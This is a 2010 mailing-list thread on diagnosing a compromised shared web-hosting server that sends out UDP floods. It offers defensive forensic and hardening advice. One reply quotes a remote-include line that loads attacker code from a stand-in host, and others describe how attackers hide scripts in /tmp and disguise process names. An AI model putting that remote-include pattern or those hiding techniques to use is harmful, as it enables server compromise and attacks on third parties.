Security Guidance

Paul_Stewart1 · February 23, 2010, 7:46pm

Hi folks...

We have a strange series of events going on in the past while.... Brief
history here, looking for input from the community - especially some of
the security folks on here.

We provide web hosting services - one of our hosting boxes was found a
while back with rootkits installed, unpatched software and lots of
other "goodies". With some staff changes in place (don't think I need
to elaborate on that) we are trying to clean up several issues including
this particular server. A new server was provisioned, patched, and
deployed. User data was moved over and now the same issue is coming
back....

The problem is that a user on this box appears to be launching high
traffic DOS attacks from it towards other sites. These are UDP based
floods that move around from time to time - most of these attacks only
last a few minutes.

I've done tcpdumps within seconds of the attack starting and to date
been unable to find the source of this attack (we know the server, just
not sure which customer it is on the server that's been compromised).
Several hours of scanning for php, cgi, pl type files have been wasted
and come up nowhere...

It's been suggested to dump IDS in front of this box and I know I'll get
some feedback positive and negative in that aspect.

What tools/practices do others use to resolve this issue? It's a
CentOS 5.4 box running the latest Plesk control panel.

Typically we have found it easy to track down the offending script or
program - this time hasn't been easy at all...

Thanks,

Paul

Ronald_Cotoni · February 23, 2010, 8:19pm

Quick suggestion, but you may want to have Parallels look into it if
you can't seem to find it, since you pay for the support anyway. You
may also want to check whether a cron job is doing it (if
the machine was rootkitted, you may have accidentally copied a cron
job over). Another suggestion would be to simply move half the accounts
to one server and half to another, see if it DDoSes again, and keep
doing that until you find the problem account.
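
A minimal sketch of the cron check, assuming per-user crontabs live under /var/spool/cron (the usual place on CentOS; adjust for other distributions). The function name list_cron_entries is made up for illustration. It prints every active crontab line prefixed with the owning file name, so a job that was copied over with the user data stands out:

```shell
# Print active (non-blank, non-comment) lines from every crontab file in a
# spool directory, prefixed with the file name (normally the user name).
# The default path is an assumption; pass another directory as $1.
list_cron_entries() {
    spool=${1:-/var/spool/cron}
    for f in "$spool"/*; do
        [ -f "$f" ] || continue
        user=$(basename "$f")
        # Skip blank lines and comment lines, keep everything else.
        awk -v u="$user" '!/^[ \t]*($|#)/ { print u ": " $0 }' "$f"
    done
}
```

Run it as root with no argument for the default spool directory. System-wide jobs in /etc/crontab and /etc/cron.d are not covered and would need a separate look.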

Matt_Sprague · February 23, 2010, 8:23pm

The user could also be running the command inline somehow or deleting the file when they log off. Check who was logged onto the server at the time of the attack to narrow down your search. I like the split the users idea, though it could be several iterations to narrow down the culprit.

Paul_Bosworth · February 23, 2010, 8:31pm

Place an ids in front of the server and write a rule for the traffic
signature.

Paul B.

Michael_Holstein · February 23, 2010, 8:38pm

The user could also be running the command inline somehow or deleting the file when they log off.

"wiretapping" your SSHd is one way to find out what people are up to

Also .. if you have the resources, a passive tap and another box that
has enough disk and I/O to keep up is useful to see who was doing what
right before the packetstorm happens.

If you can take the box offline and grab a disk image, tools like "fls"
from TSK can generate a filesystem timeline, again .. who touched what
right before it started...

Cheers,

Michael Holstein
Cleveland State University

Dan_White · February 23, 2010, 8:39pm

I'll second that. I've found a few interesting items in my
/var/spool/cron/crontab before.

Also check your web server logs. If someone has compromised an account via
an apache/php vulnerability, it might show up in your access/error log
(I saw 'wget' in my logs once).

I assume you've checked 'last' to make sure they're not getting in via a
remote shell.

ls -ltra is your friend when finding the most recently created files in your
filesystem.

If you suspect there's a running process doing it, look through your /proc
directory, like in /proc/<pid>/environ, /proc/<pid>/cmdline, etc.
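
A rough sketch of the /proc inspection, assuming a Linux /proc and GNU stat. The function name proc_summary is hypothetical. It gathers the owner, binary, working directory and command line of one process in a single view:

```shell
# Summarise what /proc knows about one process: owner, binary, working
# directory and full command line. Linux-specific.
proc_summary() {
    pid=$1
    [ -d "/proc/$pid" ] || { echo "no such pid: $pid" >&2; return 1; }
    echo "pid:     $pid"
    echo "owner:   $(stat -c %U "/proc/$pid")"
    # exe and cwd are symlinks; a target ending in "(deleted)" is a red flag.
    echo "exe:     $(readlink "/proc/$pid/exe" 2>/dev/null)"
    echo "cwd:     $(readlink "/proc/$pid/cwd" 2>/dev/null)"
    # cmdline is NUL-separated; turn the NULs into spaces for display.
    echo "cmdline: $(tr '\0' ' ' < "/proc/$pid/cmdline")"
}
```

A process can overwrite its own command line, so when cmdline and exe disagree, the exe link is usually the more trustworthy of the two. None of this helps if the kernel itself has been tampered with.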

Derrick_H · February 23, 2010, 8:45pm

The problem is that a user on this box appears to be launching high
traffic DOS attacks from it towards other sites. These are UDP based
floods that move around from time to time - most of these attacks only
last a few minutes.

Counting outbound udp bytes and packets can help spot anomalies.
Something like this would help but may be unwieldy if you have thousands
of users on a single box:

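WANIF=eth0
userlist="userA userB user..."
# One empty chain per user; the counters on the jump rule in OUTPUT
# then record that user's outbound UDP packets and bytes.
for i in ${userlist}
do
    iptables -N "${i}_UDP"
    iptables -I OUTPUT -o "${WANIF}" -p udp -m owner --uid-owner "${i}" -j "${i}_UDP"
done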

Then look at counters with:
iptables -nvL OUTPUT | grep _UDP | sort.......

I wouldn't leave this in place full-time for thousands of accounts
though without attempting to measure the impact on network performance.
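
One possible way to finish the counter check, as a sketch: it assumes the per-user rules above are in place and that every chain name ends in _UDP. The helper name top_udp_senders is made up. It reads the iptables listing on stdin and prints the busiest users first (-x asks iptables for exact byte counts instead of rounded K/M values):

```shell
# Read `iptables -nvxL OUTPUT` output on stdin and print "bytes packets chain"
# for every per-user *_UDP rule, busiest first.
top_udp_senders() {
    awk '$3 ~ /_UDP$/ { print $2, $1, $3 }' | sort -k1,1nr
}
# Typical use (as root): iptables -nvxL OUTPUT | top_udp_senders
```

Zeroing the counters with iptables -Z OUTPUT before a watch period makes a short flood easier to spot, since the totals then cover only that period.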

David_Freedman1 · February 23, 2010, 8:47pm

What tools/practices do others use to resolve this issue?

use lsof, should be able to show you consumption of network socket
resources by process (and hence user, hopefully)

Dave.

Alexandre_Carmel-Vei · February 23, 2010, 8:51pm

These tools will relate IP flow to UID in Linux:

# Get the sockets that are open
netstat -an
# lsof (as root) sockets to pid and owner uid.
lsof

If netstat doesn't show it, it could be a raw socket... Or your root-kit's
still there. Raw sockets will still show in lsof.
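
A small sketch of tying sockets to users, assuming the standard lsof column layout (COMMAND, PID, USER, ...). The helper name udp_sockets_by_user is hypothetical. It reads the lsof listing on stdin and counts open UDP sockets per user and command:

```shell
# Read `lsof -nP -iUDP` output on stdin and print, per user and command,
# how many UDP sockets are open, largest count first.
udp_sockets_by_user() {
    awk 'NR > 1 { n[$3 " " $1]++ }
         END { for (k in n) print n[k], k }' | sort -k1,1nr
}
# Typical use (as root): lsof -nP -iUDP | udp_sockets_by_user
```

The count matters less than who shows up at all: on a web hosting box, a perl or php process owned by the web server user and holding UDP sockets probably deserves a closer look.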

Alex

Chris_Adams3 · February 23, 2010, 8:55pm

Once upon a time, Matt Sprague <msprague@readytechs.com> said:

The user could also be running the command inline somehow or deleting
the file when they log off. Check who was logged onto the server at
the time of the attack to narrow down your search. I like the split
the users idea, though it could be several iterations to narrow down
the culprit.

We've also seen this with spammers. They'll upload a PHP via a
compromised account, connect to it via HTTP, and then delete it from the
filesystem. The PHP continues to run, Apache doesn't log anything
(because it only logs at the end of a request), and the admin is left
scratching his head to figure out where the problem is.

IIRC PHP holds an open file descriptor on active scripts, so you can use
lsof to look for things like this (look for "deleted" or "path inode"
entries).
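
A sketch of the same idea without lsof, assuming a Linux /proc and GNU stat: the kernel appends " (deleted)" to the symlink target of any open file that has been unlinked. The function name list_deleted_open_files is made up for illustration:

```shell
# Walk every process's open file descriptors and print
# "pid <TAB> owner <TAB> path (deleted)" for files that no longer exist on disk.
list_deleted_open_files() {
    for fd in /proc/[0-9]*/fd/*; do
        target=$(readlink "$fd" 2>/dev/null) || continue
        case "$target" in
            *" (deleted)")
                pid=${fd#/proc/}
                pid=${pid%%/*}
                owner=$(stat -c %U "/proc/$pid" 2>/dev/null)
                printf '%s\t%s\t%s\n' "$pid" "${owner:-?}" "$target"
                ;;
        esac
    done
}
```

Run it as root so that other users' descriptors are readable. Some hits are harmless (daemons routinely keep deleted temp files open), so the interesting ones are scripts under a vhost directory or /tmp. With lsof installed, lsof +L1 gives a similar listing.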

Joe_Conlin · February 23, 2010, 9:15pm

From personal experience you will likely not find much help from
Parallels. We provide webhosting here on the Plesk 8.x and 9 platforms
and in similar situations I have found good results using a combination
of OSSEC (http://www.ossec.net/ BIG shout out to these guys, this
project makes my life so much easier), and enabling Apache mod_status.
Netstat, lsof, and ntop (www.ntop.org) are also useful.

Also, the default PHP configs in a Plesk deployment should be
reviewed; I once had an IRC bot written in PHP being remotely included
into a customer's site because of a server mis-configuration (make sure
php.ini has "allow_url_fopen = Off" and "allow_url_include = Off").
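
A quick sketch for checking those two settings, assuming the main configuration is /etc/php.ini (per-vhost overrides, if any, are not covered). The function name php_remote_include_settings is hypothetical:

```shell
# Report the value of the two remote-include switches in a php.ini.
# Prints "setting=value" for each one found; the last uncommented
# assignment in the file wins.
php_remote_include_settings() {
    ini=${1:-/etc/php.ini}
    for key in allow_url_fopen allow_url_include; do
        awk -F= -v k="$key" '
            /^[ \t]*;/ { next }                       # skip comment lines
            { name = $1; gsub(/[ \t]/, "", name) }
            name == k { val = $2; sub(/;.*/, "", val); gsub(/[ \t"]/, "", val) }
            END { if (val != "") print k "=" val }
        ' "$ini"
    done
}
```

Anything other than Off in the output is worth reviewing. A setting that prints nothing is not set in that file and falls back to the PHP default.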

Seeing as how your server is generating UDP traffic, it's possible that
your DNS (Bind) configs are allowing recursion and this is what's being
abused (Plesk is bundled with Bind to handle the vhost DNS hosting).
Either it is allowing public recursion or a local user may be abusing
local recursion abilities.... a helpful tool for monitoring DNS queries
on your server is "dnstop"
(http://dns.measurement-factory.com/tools/dnstop/).

You should also check out #plesk on freenode for a wealth of Plesk
security knowledge. Hope this helps

Joe Conlin
Access Northeast
jconlin@axsne.com
www.axsne.com

"Your Partner for IP Network Solutions"

Nate_Itkin · February 23, 2010, 9:27pm

It's possible the user inadvertently enabled the same exploit after you
rebuilt the system. I suggest caution with assigning culpability.

Nate Itkin

Valdis_Kletnieks · February 23, 2010, 10:13pm

Or the gold image used to rebuild was itself vulnerable. It happens a lot
more often than you think. I'd suggest *lots* of caution with assigning
culpability.

Nathan_Ward · February 23, 2010, 10:38pm

Using lsof, netstat, ls, ps, looking through proc with ls, cat, etc. is likely to not work if there's a rootkit on the box. The whole point of a rootkit is to hide processes and files from these tools.

Get some statically linked versions of these bins on to the server, and hope they haven't patched your kernel.

Are you sure that it's someone who has root? How do you know? Is it not possible that it's someone running this from a PHP script or something, that they've gotten on to the server with the help of a vulnerability in some customer's website code? Maybe it's even a customer doing this intentionally?
I've seen this sort of thing where they don't even write the code to disk - some vuln in a PHP script lets them download code from some remote server and execute it from memory - PHP's require() accepts a URL.

The usual thing to do here is to take the server offline and make a copy of the disk with a writeblocker in place to prevent further changes, etc. and then inspect the image of the disk on a machine that is not using any binaries from that disk. If there really is a rootkit in place then you'll likely find it.
If you're unable to do this, perhaps boot up the server from a CD, there are plenty of forensic analysis/security targeted Linux boot CDs around.

If you're unable to capture full packets, perhaps netflow would be useful? - look for incoming data to ports you don't expect. It's much more lightweight on your data storage, and probably doesn't involve you putting in a new server - but a bit heavier on your network kit.

Joe · February 23, 2010, 10:47pm

Just figured I might add a little direction to this.

1. If it's a production system that impacts several users/customers, your best
bet would be to rebuild the system from scratch, not from an image. Yes, it takes
time, but investigating it will likely take longer. As you previously
mentioned, the folk(s) that were in charge of the system are no longer in
that capacity, and (depending on their "craftiness") they could have
left an exploit, intentional or not, that is now plaguing you.

2. If you're intent on finding a root cause, you will probably need to spend
quite a bit of time and caution investigating the said system. As soon as
there's mention of a "rootkit", everything is suspect, i.e. ls might not be
ls, df may not be df. It might be worth adding the volume to a known good
system, mounting it, and comparing the image/structure and said files. But of
course, as I mentioned above, if it's a critical system then you're kind of
stuck with an aggressive timeline, so...

Obviously an IDP will mask the issue, but won't fix it.

Good luck
-Joe Blanchard

Express_Web_Systems · February 23, 2010, 11:19pm

The problem is that a user on this box appears to be launching high
traffic DOS attacks from it towards other sites. These are UDP based
floods that move around from time to time - most of these attacks only
last a few minutes.

I've done tcpdumps within seconds of the attack starting and to date
been unable to find the source of this attack (we know the server, just
not sure which customer it is on the server that's been compromised).
Several hours of scanning for php, cgi, pl type files have been wasted
and come up nowhere...

As others have suggested turning off remote file includes is a good start in
php.ini. PHP5 has some rather nice settings to allow more flexible
configuration of this (while still allowing PHP programmers to be lazy and
do things like file('http://foo/index.php') but I digress).

Plesk uses open_basedir by default on its Apache config which will help
limit what the hacker has access to via the web daemon. However it still
allows unrestricted access to /tmp for obvious reasons. We generally set
/tmp to be noexec and nosuid for our disk images. This helps make things
more difficult for the script kiddies, but doesn't stop them completely.
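
A small sketch for verifying the /tmp mount options, assuming the /proc/mounts line format (device, mount point, type, options, ...). The function name check_tmp_mount is made up for illustration:

```shell
# Read /proc/mounts-style lines on stdin and report whether the given mount
# point carries both noexec and nosuid. Exit status is 0 only when both are set.
check_tmp_mount() {
    mp=${1:-/tmp}
    awk -v mp="$mp" '
        $2 == mp { found = 1; opts = "," $4 "," }
        END {
            if (!found) { print mp ": not a separate mount"; exit 1 }
            if (opts ~ /,noexec,/ && opts ~ /,nosuid,/) { print mp ": ok"; exit 0 }
            print mp ": missing noexec and/or nosuid"; exit 1
        }'
}
# Typical use: check_tmp_mount /tmp < /proc/mounts
```

On a live system the options can be applied with mount -o remount,noexec,nosuid /tmp. Note that noexec only blocks direct execution: a script in /tmp can still be run by passing it to an interpreter, which is why this slows attackers down rather than stopping them.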

Since customer data must be carried over to each instance of the server, it
is most likely the attack vector being exploited (it is the one thing common
to each instance). Either
a PHP based shell, something as simple as a file uploader/shell script, or
the aforementioned remote file include is likely the cause.

They are most likely uploading a perl script to /tmp, firing it off with a
shell command via the apache user, then removing it from /tmp and masking
its program name so that it doesn't appear obvious in a report from ps (I
have seen httpd most of the time, which is fairly obvious to spot on a
Debian server thankfully - apache runs as apache(2) on Debian rather than
httpd on RedHat/CentOS).

If you are able... I would create a noexec,nosuid /tmp mount and if at all
possible... limit perl to only be accessible for the root user (chmod 700).
This is a tad extreme, but it has helped me in the past. Another thing (if
that isn't possible) is to place a wrapper around perl that will log what
user accessed perl, at what time, and which script was executed. This
information will prove to be invaluable in helping narrow down where the
attack is originating. Once you have a timestamp, it's just a matter of
going through your logs to find what was going on where at that specific
instant on the server.
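
A minimal sketch of such a wrapper. The paths are assumptions: it supposes the real interpreter has been moved to /usr/bin/perl.real and that the log file can be appended to by every account that may run perl. The function name perl_wrapper is hypothetical:

```shell
# Sketch of a logging wrapper for perl. Both default paths are hypothetical
# and can be overridden through the environment.
REAL_PERL=${REAL_PERL:-/usr/bin/perl.real}
PERL_WRAPPER_LOG=${PERL_WRAPPER_LOG:-/var/log/perl-wrapper.log}

perl_wrapper() {
    # Record when, who, from which parent and directory, and with which
    # arguments perl was started.
    printf '%s uid=%s ppid=%s cwd=%s args=%s\n' \
        "$(date '+%Y-%m-%d %H:%M:%S')" "$(id -u)" "$PPID" "$PWD" "$*" \
        >> "$PERL_WRAPPER_LOG" 2>/dev/null
    # Hand over to the real interpreter with the original arguments.
    "$REAL_PERL" "$@"
}
# Installed as /usr/bin/perl, the script would end with: perl_wrapper "$@"
```

Two caveats: code passed with -e or on stdin shows up only as arguments, not as a script path, and some kernels refuse to use a script as a "#!" interpreter, so test that existing "#!/usr/bin/perl" scripts still start before relying on this.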

Also take a look at the server wide apache logs (in /var/log) as there might
be valuable information in there perhaps leading you closer to a culprit.

Good luck, these sorts of issues are difficult to track down and take time
and patience to clean up.

If you would like please contact me off-list for more assistance. I have
been using Plesk since 1.0 so I am pretty familiar with its ins and outs.

Warm regards,

Tom Walsh

Gadi_Evron1 · February 24, 2010, 12:20am

If you can't discover the malware using the methods available to you, are you able to provide us with a packet dump of the DoS? It might help us pinpoint the relevant botnet and/or bot.

As to web server botnets, you may be interested in this 2007 article from me on the subject:
http://gadievron.com/publications/GadiEvron_VBFeb07.pdf

Good luck,

Gadi.

Joel_Esler2 · February 24, 2010, 1:55am

Why does there need to be blame? Diagnose the problem, fix the problem, move on with life. Someone made a mistake, learn from it, move on.

Adam_Stasiniewicz · February 24, 2010, 2:20am

I’ve seen similar. Another variant of this is PHP code that lets
arbitrary data be passed into require() or include() statements, for
example: include('http://evilsite.com/evil.txt'). That way, the attacker
can then load whatever code they want and it will never be saved to the
file system. I would recommend verifying that all the shrink-wrapped
products (i.e. forums, blogs, CMS, etc) on the server are checked to ensure
that they are at the most current update/patch level and are not EOL. Generally
most of those vendors are good at responding to security issues in their
products, but it’s up to the person running the website to update their
code.

Also, have you considered enabling SELinux? Enforcing the targeted policy
will prevent Apache from making outbound socket connections (and may break
other stuff), but it might be worth the headache. On a similar note,
mod_security also may help (depending on how the attack is being launched)
but again may break some things.

If the attack is possibly being launched via SSH/shell access, enable
password complexity then force all of your clients to change their
password.

Hope that helps,
Adam Stasiniewicz

Laurens_Vets · February 24, 2010, 11:29am

<snip>

The problem is that a user on this box appears to be launching high
traffic DOS attacks from it towards other sites. These are UDP based
floods that move around from time to time - most of these attacks only
last a few minutes.

Maybe it's not 'malicious' at all. For instance, is there a Bittorrent client on the box?

<snip>